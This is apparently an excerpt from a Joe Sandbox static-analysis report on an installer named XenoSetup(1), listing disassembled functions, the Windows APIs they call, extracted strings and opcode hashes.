                                                                                      • API ID: FeaturePresentProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 2325560087-0
                                                                                      • Opcode ID: 9d805d68313259e407ba894d394a28a68058d96fbc11516580e0d2744b626ba8
                                                                                      • Instruction ID: 4eda7eaf33959bef9fe3a5c6ddebaebdc95fb54f848db4ab19f067724bff1487
                                                                                      • Opcode Fuzzy Hash: 9d805d68313259e407ba894d394a28a68058d96fbc11516580e0d2744b626ba8
                                                                                      • Instruction Fuzzy Hash: D2519EB2D006098FEB25DF54E9817AEBBF0FF88354F24847AC981EB254D379A944CB50
                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?), ref: 00FEB16B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Version
                                                                                      • String ID:
                                                                                      • API String ID: 1889659487-0
                                                                                      • Opcode ID: 74e12aceaf7f86a63b191009969ce57836568eeb87812db7de230e27d8ca53cd
                                                                                      • Instruction ID: 57b68683f7af6ba317d24054b13692f1fe49250a47bde36464ebbbcb29592861
                                                                                      • Opcode Fuzzy Hash: 74e12aceaf7f86a63b191009969ce57836568eeb87812db7de230e27d8ca53cd
                                                                                      • Instruction Fuzzy Hash: 24F030B4E002488FDB39CF18E8956DA73F1FB48325F2042A5EA5593384C3BDA9808F60
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00FFF3A5), ref: 00FFF9DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: ed19652709b326262d64b05584205555cb93f79eafd7561f46ee83a8d5d8ee26
                                                                                      • Instruction ID: db1474d92365e174b5aa9e4869a962fa7220c7ed0a03df8f4e8199486bd24066
                                                                                      • Opcode Fuzzy Hash: ed19652709b326262d64b05584205555cb93f79eafd7561f46ee83a8d5d8ee26
                                                                                      • Instruction Fuzzy Hash:
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapProcess
                                                                                      • String ID:
                                                                                      • API String ID: 54951025-0
                                                                                      • Opcode ID: 9566c7183f53877eae2bb9d0d42aa9511d533a330945d0c0cb6be8b7c1830a69
                                                                                      • Instruction ID: 1dd6d16c7d46924df7eb24087fc086c652035020198a8415b4909df662b89949
                                                                                      • Opcode Fuzzy Hash: 9566c7183f53877eae2bb9d0d42aa9511d533a330945d0c0cb6be8b7c1830a69
                                                                                      • Instruction Fuzzy Hash: F4A02474301100CFC310CF30774C30C3FF475041D030500157C44C4004D73D40505700
                                                                                      APIs
                                                                                      • _swprintf.LIBCMT ref: 00FEE30E
                                                                                        • Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5
                                                                                        • Part of subcall function 00FF1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,01021030,00000200,00FED928,00000000,?,00000050,01021030), ref: 00FF1DC4
                                                                                      • _strlen.LIBCMT ref: 00FEE32F
                                                                                      • SetDlgItemTextW.USER32(?,0101E274,?), ref: 00FEE38F
                                                                                      • GetWindowRect.USER32(?,?), ref: 00FEE3C9
                                                                                      • GetClientRect.USER32(?,?), ref: 00FEE3D5
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FEE475
                                                                                      • GetWindowRect.USER32(?,?), ref: 00FEE4A2
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00FEE4DB
                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00FEE4E3
                                                                                      • GetWindow.USER32(?,00000005), ref: 00FEE4EE
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00FEE51B
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00FEE58D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                      • String ID: $%s:$CAPTION$d
                                                                                      • API String ID: 2407758923-2512411981
                                                                                      • Opcode ID: 1e50079bb6c172b19e325347114e8e85503c05580f770a3eea1f4b770f58ef56
                                                                                      • Instruction ID: b7c18bd9f79cd0708f436d2ca6586837a5b6c66db906dc8a984d6cee0d1bd974
                                                                                      • Opcode Fuzzy Hash: 1e50079bb6c172b19e325347114e8e85503c05580f770a3eea1f4b770f58ef56
                                                                                      • Instruction Fuzzy Hash: E281A0B2608341AFD720DF69DD88A6FBBE9FBC8714F04091DFA84D7294D635E8058B52
                                                                                      APIs
                                                                                      • ___free_lconv_mon.LIBCMT ref: 0100CB66
                                                                                        • Part of subcall function 0100C701: _free.LIBCMT ref: 0100C71E
                                                                                        • Part of subcall function 0100C701: _free.LIBCMT ref: 0100C730
                                                                                        • Part of subcall function 0100C701: _free.LIBCMT ref: 0100C742
                                                                                        • Part of subcall function 0100C701: _free.LIBCMT ref: 0100C754
                                                                                        • Part of subcall function 0100C701: _free.LIBCMT ref: 0100C766
                                                                                        • Part of subcall function 0100C701: _free.LIBCMT ref: 0100C778
                                                                                        • Part of subcall function 0100C701: _free.LIBCMT ref: 0100C78A
                                                                                        • Part of subcall function 0100C701: _free.LIBCMT ref: 0100C79C
                                                                                        • Part of subcall function 0100C701: _free.LIBCMT ref: 0100C7AE
                                                                                        • Part of subcall function 0100C701: _free.LIBCMT ref: 0100C7C0
                                                                                        • Part of subcall function 0100C701: _free.LIBCMT ref: 0100C7D2
                                                                                        • Part of subcall function 0100C701: _free.LIBCMT ref: 0100C7E4
                                                                                        • Part of subcall function 0100C701: _free.LIBCMT ref: 0100C7F6
                                                                                      • _free.LIBCMT ref: 0100CB5B
                                                                                        • Part of subcall function 01008DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34), ref: 01008DE2
                                                                                        • Part of subcall function 01008DCC: GetLastError.KERNEL32(01013A34,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34,01013A34), ref: 01008DF4
                                                                                      • _free.LIBCMT ref: 0100CB7D
                                                                                      • _free.LIBCMT ref: 0100CB92
                                                                                      • _free.LIBCMT ref: 0100CB9D
                                                                                      • _free.LIBCMT ref: 0100CBBF
                                                                                      • _free.LIBCMT ref: 0100CBD2
                                                                                      • _free.LIBCMT ref: 0100CBE0
                                                                                      • _free.LIBCMT ref: 0100CBEB
                                                                                      • _free.LIBCMT ref: 0100CC23
                                                                                      • _free.LIBCMT ref: 0100CC2A
                                                                                      • _free.LIBCMT ref: 0100CC47
                                                                                      • _free.LIBCMT ref: 0100CC5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                      • String ID:
                                                                                      • API String ID: 161543041-0
                                                                                      • Opcode ID: 83d4cf5c3931e2573c32767ad06921b2ab64ffa53c5175debfe0d09ff8c6b4c0
                                                                                      • Instruction ID: 9622e71a962c0dcfad891f4d3679700aec73eb7f89614c24187de0eca03f8b51
                                                                                      • Opcode Fuzzy Hash: 83d4cf5c3931e2573c32767ad06921b2ab64ffa53c5175debfe0d09ff8c6b4c0
                                                                                      • Instruction Fuzzy Hash: ED314D31A006079FFB63AA7CDA44B9A77E9BF10210F1486AAE5C9D71D1DE75A840DB10
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00FF9736
                                                                                      • _wcslen.LIBCMT ref: 00FF97D6
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00FF97E5
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00FF9806
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FF982D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                      • API String ID: 1777411235-4209811716
                                                                                      • Opcode ID: d5e920ebcda9856f0c2073aa673920104e070ae224454fda12ef27a83e052720
                                                                                      • Instruction ID: 0cc4ed1931b752d9c4366436c4edca464d87c4e5e03b20a89ea4902c9e9eae2b
                                                                                      • Opcode Fuzzy Hash: d5e920ebcda9856f0c2073aa673920104e070ae224454fda12ef27a83e052720
                                                                                      • Instruction Fuzzy Hash: EF3137325083067EE726AB21DC45FBB7798EF52760F14011DF6819A1E1EBA99904C3A6
                                                                                      APIs
                                                                                      • GetWindow.USER32(?,00000005), ref: 00FFD6C1
                                                                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 00FFD6ED
                                                                                        • Part of subcall function 00FF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FEC116,00000000,.exe,?,?,00000800,?,?,?,00FF8E3C), ref: 00FF1FD1
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FFD709
                                                                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00FFD720
                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00FFD734
                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00FFD75D
                                                                                      • DeleteObject.GDI32(00000000), ref: 00FFD764
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00FFD76D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                      • String ID: STATIC
                                                                                      • API String ID: 3820355801-1882779555
                                                                                      • Opcode ID: 74d468f30867a303094a22fc958fa28e9a3eb7e3245919af1c56c05ccc154115
                                                                                      • Instruction ID: bf55afac75985f7eb12e084dc5145d1c6c822638034120a03cfe46af99f82de6
                                                                                      • Opcode Fuzzy Hash: 74d468f30867a303094a22fc958fa28e9a3eb7e3245919af1c56c05ccc154115
                                                                                      • Instruction Fuzzy Hash: 301127B75003287BE6317B709D8AFBF765DBF00711F004110FB81E90A5D66D890566A5
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 01009705
                                                                                        • Part of subcall function 01008DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34), ref: 01008DE2
                                                                                        • Part of subcall function 01008DCC: GetLastError.KERNEL32(01013A34,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34,01013A34), ref: 01008DF4
                                                                                      • _free.LIBCMT ref: 01009711
                                                                                      • _free.LIBCMT ref: 0100971C
                                                                                      • _free.LIBCMT ref: 01009727
                                                                                      • _free.LIBCMT ref: 01009732
                                                                                      • _free.LIBCMT ref: 0100973D
                                                                                      • _free.LIBCMT ref: 01009748
                                                                                      • _free.LIBCMT ref: 01009753
                                                                                      • _free.LIBCMT ref: 0100975E
                                                                                      • _free.LIBCMT ref: 0100976C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: bd33bec98f1369e67f8e4a0a77f14615662136e08ad6e202369eea37d8a388e2
                                                                                      • Instruction ID: 55d2d76c4b82df75eb6da8d4e26b61e78acce4d56147264a03a88b98fafce111
                                                                                      • Opcode Fuzzy Hash: bd33bec98f1369e67f8e4a0a77f14615662136e08ad6e202369eea37d8a388e2
                                                                                      • Instruction Fuzzy Hash: AF11A77651010AAFEB02FF54C840CD93BB5FF24250F5196A2FA4C4F2A1DA32DA50DB84
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 322700389-393685449
                                                                                      • Opcode ID: baef9006a63eeecbc7588e68935448257cafdfad4839939b48811345504bf56d
                                                                                      • Instruction ID: 2babdbd9b7e4bcf9154459a79b57931da87c262a491cb5c8dda438d3acbc9d72
                                                                                      • Opcode Fuzzy Hash: baef9006a63eeecbc7588e68935448257cafdfad4839939b48811345504bf56d
                                                                                      • Instruction Fuzzy Hash: F2B16E71800209DFEF27DFA8C8849EEBBB5BF18310F15419AE8856F292D731DA51CB91
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FE6FAA
                                                                                      • _wcslen.LIBCMT ref: 00FE7013
                                                                                      • _wcslen.LIBCMT ref: 00FE7084
                                                                                        • Part of subcall function 00FE7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FE7AAB
                                                                                        • Part of subcall function 00FE7A9C: GetLastError.KERNEL32 ref: 00FE7AF1
                                                                                        • Part of subcall function 00FE7A9C: CloseHandle.KERNEL32(?), ref: 00FE7B00
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                      • API String ID: 3122303884-3508440684
                                                                                      • Opcode ID: 5e6d5aaaecdd8deb08c674c29ddb01606ac4d4d513edc305654855b428454c88
                                                                                      • Instruction ID: 3c80dc610cf62f25c11d47bf618ad322c32179c2b1ea22664ba76a0505f2b051
                                                                                      • Opcode Fuzzy Hash: 5e6d5aaaecdd8deb08c674c29ddb01606ac4d4d513edc305654855b428454c88
                                                                                      • Instruction Fuzzy Hash: CD4114B1D083C4AAEB31FB729C81FEF776CAF14314F000455FA85A6182D77DAA48A721
                                                                                      APIs
                                                                                        • Part of subcall function 00FE1316: GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
                                                                                        • Part of subcall function 00FE1316: SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370
                                                                                      • EndDialog.USER32(?,00000001), ref: 00FFB610
                                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00FFB637
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00FFB650
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00FFB661
                                                                                      • GetDlgItem.USER32(?,00000065), ref: 00FFB66A
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00FFB67E
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00FFB694
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                      • String ID: LICENSEDLG
                                                                                      • API String ID: 3214253823-2177901306
                                                                                      • Opcode ID: 1759c8d2550ba5a4e123bc2e45fb23417967ecd15deb0c885d79308c11520b28
                                                                                      • Instruction ID: a6687556f090abcb678f14e9a4a85bfcc5c956235f2b79e84db5baf325ca3e68
                                                                                      • Opcode Fuzzy Hash: 1759c8d2550ba5a4e123bc2e45fb23417967ecd15deb0c885d79308c11520b28
                                                                                      • Instruction Fuzzy Hash: 9A21E6726442197BD2315E66EE89F3B3B6DFF4AB50F010014F780D9198DB9B9801A731
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,E81FEB93,00000001,00000000,00000000,?,?,00FEAF6C,ROOT\CIMV2), ref: 00FFFD99
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00FEAF6C,ROOT\CIMV2), ref: 00FFFE14
                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00FFFE1F
                                                                                      • _com_issue_error.COMSUPP ref: 00FFFE48
                                                                                      • _com_issue_error.COMSUPP ref: 00FFFE52
                                                                                      • GetLastError.KERNEL32(80070057,E81FEB93,00000001,00000000,00000000,?,?,00FEAF6C,ROOT\CIMV2), ref: 00FFFE57
                                                                                      • _com_issue_error.COMSUPP ref: 00FFFE6A
                                                                                      • GetLastError.KERNEL32(00000000,?,?,00FEAF6C,ROOT\CIMV2), ref: 00FFFE80
                                                                                      • _com_issue_error.COMSUPP ref: 00FFFE93
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                      • String ID:
                                                                                      • API String ID: 1353541977-0
                                                                                      • Opcode ID: 8503504f317ef4427a5fc75034659b4625b1d3825e54f007eeaebade8562b2e5
                                                                                      • Instruction ID: 4150a7bf609d5cd270079d61b7019859df77f19a64c5725db829d52ef81192e1
                                                                                      • Opcode Fuzzy Hash: 8503504f317ef4427a5fc75034659b4625b1d3825e54f007eeaebade8562b2e5
                                                                                      • Instruction Fuzzy Hash: A141C771A0021DABD7119F64DC45BBEBBA8FF44720F104239FA45EB2A1D739990497A4
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
